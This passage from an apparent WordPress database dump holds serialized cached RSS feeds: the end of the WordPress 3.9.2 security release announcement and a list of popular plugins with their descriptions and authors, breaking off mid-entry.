Team.</li>\n<li>Contains some additional security hardening, like preventing cross-site scripting that could be triggered only by administrators.</li>\n</ul>\n<p>We appreciated responsible disclosure of these issues directly to our security team. For more information, see the <a href=\"https://codex.wordpress.org/Version_3.9.2\">release notes</a> or consult the <a href=\"https://core.trac.wordpress.org/log/branches/3.9?stop_rev=29383&rev=29411\">list of changes</a>.</p>\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 3.9.2</a> or venture over to <strong>Dashboard → Updates</strong> and simply click “Update Now”.</p>\n<p>Sites that support automatic background updates will be updated to WordPress 3.9.2 within 12 hours. (If you are still on WordPress 3.8.3 or 3.7.3, you will also be updated to 3.8.4 or 3.7.4. We don’t support older versions, so please update to 3.9.2 for the latest and greatest.)</p>\n<p>Already testing WordPress 4.0? The third beta is <a href=\"https://wordpress.org/wordpress-4.0-beta3.zip\">now available</a> (zip) and it contains these security fixes.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/08/wordpress-3-9-2/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:9:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Mon, 09 Feb 2015 22:26:13 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:10:\"x-pingback\";s:37:\"https://wordpress.org/news/xmlrpc.php\";s:13:\"last-modified\";s:29:\"Thu, 18 Dec 2014 18:57:51 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 250\";}s:5:\"build\";s:14:\"20130522182132\";}','no'),(757,'_transient_timeout_feed_a5420c83891a9c88ad2a4f04584a5efc','1423563975','no'),(758,'_transient_feed_a5420c83891a9c88ad2a4f04584a5efc','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n \n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:72:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"WordPress Plugins » View: Most Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/browse/popular/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"WordPress Plugins » View: Most Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 22:08:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://bbpress.org/?v=1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:15:{i:0;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Contact Form 7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/contact-form-7/#post-2141\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 02 Aug 2007 12:45:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2141@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Just another contact form plugin. Simple but flexible.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Takayuki Miyoshi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Akismet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/plugins/akismet/#post-15\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:11:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"15@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"Akismet checks your comments against the Akismet Web service to see if they look like spam or not.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"All in One SEO Pack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/all-in-one-seo-pack/#post-753\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Mar 2007 20:08:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"753@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:126:\"All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"uberdose\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WooCommerce - excelling eCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/woocommerce/#post-29860\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Sep 2011 08:13:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29860@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WooCommerce is a powerful, extendable eCommerce plugin that helps you sell anything. Beautifully.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"WooThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"WordPress SEO by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wordpress.org/plugins/wordpress-seo/#post-8321\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Jan 2009 20:34:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"8321@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"Improve your WordPress SEO: Write better content and have a fully optimized WordPress site using Yoast's WordPress SEO plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Jetpack by WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wordpress.org/plugins/jetpack/#post-23862\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Jan 2011 02:21:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"23862@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Your WordPress, Streamlined.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Tim Moore\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"Google Analytics Dashboard for WP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://wordpress.org/plugins/google-analytics-dashboard-for-wp/#post-50539\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 10 Mar 2013 17:07:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"50539@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"Displays Google Analytics reports and real-time statistics in your WordPress Dashboard. Inserts the latest tracking code in every page of your site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Alin Marcu\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Google Analytics by Yoast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/plugins/google-analytics-for-wordpress/#post-2316\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Sep 2007 12:15:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2316@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:124:\"Track your WordPress site easily with the latest tracking codes and lots added data for search result pages and error pages.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"iThemes Security (formerly Better WP Security)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/better-wp-security/#post-21738\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Oct 2010 22:06:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"21738@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"The easiest, most effective way to secure WordPress in seconds.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Chris Wiegman\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"WordPress Importer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/wordpress-importer/#post-18101\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 May 2010 17:42:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"18101@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Import posts, pages, comments, custom fields, categories, tags and more from a WordPress export file.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brian Colinger\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Wordfence Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wordfence/#post-29832\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 04 Sep 2011 03:13:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29832@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:137:\"Wordfence Security is a free enterprise class security and performance plugin that makes your site up to 50 times faster and more secure.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Wordfence\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"UpdraftPlus Backup and 